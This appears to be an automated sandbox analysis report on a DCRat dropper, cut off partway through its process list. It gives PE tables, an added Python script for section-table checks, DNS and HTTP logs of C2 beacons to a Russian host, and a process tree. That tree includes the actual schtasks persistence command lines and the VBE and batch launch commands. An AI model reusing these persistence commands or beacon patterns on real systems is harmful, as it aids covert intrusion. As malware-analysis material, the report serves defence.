                • [C++] VS2015 UPD3.1 build 24215
                • [EXP] VS2015 UPD3.1 build 24215
                • [RES] VS2015 UPD3 build 24213
                • [LNK] VS2015 UPD3.1 build 24215
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdfd0 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x63000 | 0xdfd0 | 0xe000 | f6c0f34fae6331b50a7ad2efc4bfefdb | False | 0.6370326450892857 | data | 6.6367506404157535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
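The section table also tells you how much of the 1'661'068-byte file the PE image actually accounts for. The six raw sizes sum to 315,392 bytes (about 308 KB); everything beyond the end of the last section is an overlay, the usual place a native dropper keeps its payload, and the 1,344,000-byte .NET executable listed among the dropped files fits inside it. The Python below is an added example, not part of the report, that does this arithmetic from the values in the table and runs the consistency checks an analyst applies before trusting a section table. Three values are assumptions because the page does not state them: a file alignment of 0x200 (every raw size above is a multiple of it), a section alignment of 0x1000, and a SizeOfHeaders of 0x400 with sections laid out contiguously; on the real file you would read PointerToRawData from each section header instead of assuming contiguity.

```python
from dataclasses import dataclass
from typing import List, Optional

# Header values taken from the report above.
FILE_SIZE = 1_661_068            # "File size"
IMAGE_BASE = 0x400000            # "Imagebase"
ENTRYPOINT = 0x41ec40            # "Entrypoint" (a virtual address, not an RVA)
DROPPED_PE_SIZE = 1_344_000      # size of the dropped .NET executable

# Not on the page; assumed. 0x200 matches every raw size in the table, 0x1000 is
# the common section alignment, 0x400 a typical SizeOfHeaders for six sections.
FILE_ALIGNMENT = 0x200
SECTION_ALIGNMENT = 0x1000
SIZE_OF_HEADERS = 0x400


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: str


# Transcribed from the section table above.
SECTIONS: List[Section] = [
    Section(".text",  0x1000,  0x310ea, 0x31200, "IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ"),
    Section(".rdata", 0x33000, 0xa612,  0xa800,  "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    Section(".data",  0x3e000, 0x23728, 0x1000,  "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"),
    Section(".didat", 0x62000, 0x188,   0x200,   "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"),
    Section(".rsrc",  0x63000, 0xdfd0,  0xe000,  "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    Section(".reloc", 0x71000, 0x2268,  0x2400,  "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ"),
]


def align_up(value: int, alignment: int) -> int:
    return -(-value // alignment) * alignment


def layout_end(sections: List[Section]) -> int:
    """File offset just past the last section, assuming raw data starts at
    SIZE_OF_HEADERS and is contiguous (read PointerToRawData on a real file)."""
    offset = align_up(SIZE_OF_HEADERS, FILE_ALIGNMENT)
    for s in sections:
        if s.raw_size % FILE_ALIGNMENT:
            raise ValueError(f"{s.name}: raw size {s.raw_size:#x} violates file alignment")
        offset += s.raw_size
    return offset


def overlay_size(file_size: int, sections: List[Section]) -> int:
    """Bytes appended after the PE image; droppers commonly keep the payload here."""
    return file_size - layout_end(sections)


def section_for_rva(rva: int, sections: List[Section]) -> Optional[str]:
    """Name of the section whose aligned virtual range contains the RVA."""
    for s in sections:
        end = s.virtual_address + align_up(s.virtual_size, SECTION_ALIGNMENT)
        if s.virtual_address <= rva < end:
            return s.name
    return None


def table_findings(sections: List[Section]) -> List[str]:
    """Consistency checks: VA gaps, W+X sections, virtual size beyond raw size."""
    findings = []
    for prev, cur in zip(sections, sections[1:]):
        expected = align_up(prev.virtual_address + prev.virtual_size, SECTION_ALIGNMENT)
        if cur.virtual_address != expected:
            findings.append(f"{cur.name}: VA {cur.virtual_address:#x}, expected {expected:#x}")
    for s in sections:
        if "IMAGE_SCN_MEM_WRITE" in s.characteristics and "IMAGE_SCN_MEM_EXECUTE" in s.characteristics:
            findings.append(f"{s.name}: writable and executable")
        if s.virtual_size > s.raw_size:
            findings.append(f"{s.name}: VirtualSize {s.virtual_size:#x} exceeds RawSize "
                            f"{s.raw_size:#x}; the remainder is zero-filled at load")
    return findings
```

For this table the layout ends at 316,416 bytes, leaving 1,344,652 bytes of overlay, the entrypoint RVA (0x1ec40) resolves to `.text` as the report says, and the only finding is the `.data` section, whose 0x23728 virtual size against 0x1000 raw bytes is ordinary uninitialised data for a C/C++ binary rather than evidence of packing on its own.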
                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                PNG | 0x63650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                PNG | 0x64198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                RT_ICON | 0x65748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                RT_ICON | 0x65cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                RT_ICON | 0x66558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                RT_ICON | 0x67400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                RT_ICON | 0x67868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                RT_ICON | 0x68910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                RT_ICON | 0x6aeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                RT_DIALOG | 0x6f588 | 0x286 | data | English | United States | 0.5092879256965944
                RT_DIALOG | 0x6f358 | 0x13a | data | English | United States | 0.60828025477707
                RT_DIALOG | 0x6f498 | 0xec | data | English | United States | 0.6991525423728814
                RT_DIALOG | 0x6f228 | 0x12e | data | English | United States | 0.5927152317880795
                RT_DIALOG | 0x6eef0 | 0x338 | data | English | United States | 0.45145631067961167
                RT_DIALOG | 0x6ec98 | 0x252 | data | English | United States | 0.5757575757575758
                RT_STRING | 0x6ff68 | 0x1e2 | data | English | United States | 0.3900414937759336
                RT_STRING | 0x70150 | 0x1cc | data | English | United States | 0.4282608695652174
                RT_STRING | 0x70320 | 0x1b8 | data | English | United States | 0.45681818181818185
                RT_STRING | 0x704d8 | 0x146 | data | English | United States | 0.5153374233128835
                RT_STRING | 0x70620 | 0x446 | data | English | United States | 0.340036563071298
                RT_STRING | 0x70a68 | 0x166 | data | English | United States | 0.49162011173184356
                RT_STRING | 0x70bd0 | 0x152 | data | English | United States | 0.5059171597633136
                RT_STRING | 0x70d28 | 0x10a | data | English | United States | 0.49624060150375937
                RT_STRING | 0x70e38 | 0xbc | data | English | United States | 0.6329787234042553
                RT_STRING | 0x70ef8 | 0xd6 | data | English | United States | 0.5747663551401869
                RT_GROUP_ICON | 0x6ec30 | 0x68 | data | English | United States | 0.7019230769230769
                RT_MANIFEST | 0x6f810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                DLL | Import
                KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                Language of compilation system | Country where language is spoken
                English | United States
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 27, 2024 18:32:14.124471903 CET | 49730 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:14.244144917 CET | 80 | 49730 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:14.244266033 CET | 49730 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:14.245207071 CET | 49730 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:14.364701033 CET | 80 | 49730 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:15.709835052 CET | 80 | 49730 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:15.715464115 CET | 80 | 49730 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:15.715522051 CET | 49730 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:15.721837997 CET | 49730 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:15.729032993 CET | 49732 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:15.843764067 CET | 80 | 49730 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:15.851027966 CET | 80 | 49732 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:15.851110935 CET | 49732 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:15.851296902 CET | 49732 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:15.970769882 CET | 80 | 49732 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:17.234828949 CET | 80 | 49732 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:17.234931946 CET | 80 | 49732 | 141.8.197.42 | 192.168.2.4
                Dec 27, 2024 18:32:17.235006094 CET | 49732 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:17.281054974 CET | 49732 | 80 | 192.168.2.4 | 141.8.197.42
                Dec 27, 2024 18:32:17.401525974 CET | 80 | 49732 | 141.8.197.42 | 192.168.2.4
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 27, 2024 18:32:13.639236927 CET | 50121 | 53 | 192.168.2.4 | 1.1.1.1
                Dec 27, 2024 18:32:14.118155003 CET | 53 | 50121 | 1.1.1.1 | 192.168.2.4
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Dec 27, 2024 18:32:13.639236927 CET | 192.168.2.4 | 1.1.1.1 | 0xf29e | Standard query (0) | a1067345.xsph.ru | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Dec 27, 2024 18:32:14.118155003 CET | 1.1.1.1 | 192.168.2.4 | 0xf29e | No error (0) | a1067345.xsph.ru | | 141.8.197.42 | A (IP address) | IN (0x0001) | false
                • a1067345.xsph.ru
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.4 | 49730 | 141.8.197.42 | 80 | 8168 | C:\Program Files\Windows Portable Devices\Idle.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 27, 2024 18:32:14.245207071 CET | 480 | OUT | GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                Host: a1067345.xsph.ru
                Connection: Keep-Alive
                Dec 27, 2024 18:32:15.709835052 CET | 303 | IN | HTTP/1.1 400 Bad Request
                Server: openresty
                Date: Fri, 27 Dec 2024 17:32:15 GMT
                Content-Type: text/html
                Content-Length: 154
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.4 | 49732 | 141.8.197.42 | 80 | 8168 | C:\Program Files\Windows Portable Devices\Idle.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 27, 2024 18:32:15.851296902 CET | 456 | OUT | GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                Host: a1067345.xsph.ru
                Dec 27, 2024 18:32:17.234828949 CET | 303 | IN | HTTP/1.1 400 Bad Request
                Server: openresty
                Date: Fri, 27 Dec 2024 17:32:17 GMT
                Content-Type: text/html
                Content-Length: 154
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                Target ID:0
                Start time:12:31:56
                Start date:27/12/2024
                Path:C:\Users\user\Desktop\rWjaZEKha8.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\rWjaZEKha8.exe"
                Imagebase:0x170000
                File size:1'661'068 bytes
                MD5 hash:5D579285E5EFDF6DE25DA8D83D7AA9BE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:1
                Start time:12:31:56
                Start date:27/12/2024
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe"
                Imagebase:0x550000
                File size:147'456 bytes
                MD5 hash:FF00E0480075B095948000BDC66E81F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:12:32:01
                Start date:27/12/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "
                Imagebase:0x240000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:12:32:01
                Start date:27/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:12:32:02
                Start date:27/12/2024
                Path:C:\bridgehyperperfdhcp\intoDhcp.exe
                Wow64 process (32bit):false
                Commandline:"C:\bridgehyperperfdhcp\intoDhcp.exe"
                Imagebase:0xd60000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1750999526.0000000003622000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1750999526.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1752275310.00000000132DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 76%, ReversingLabs
                Reputation:low
                Has exited:true

                Target ID:5
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:6
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:9
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:12
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:13
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:14
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:15
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:16
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
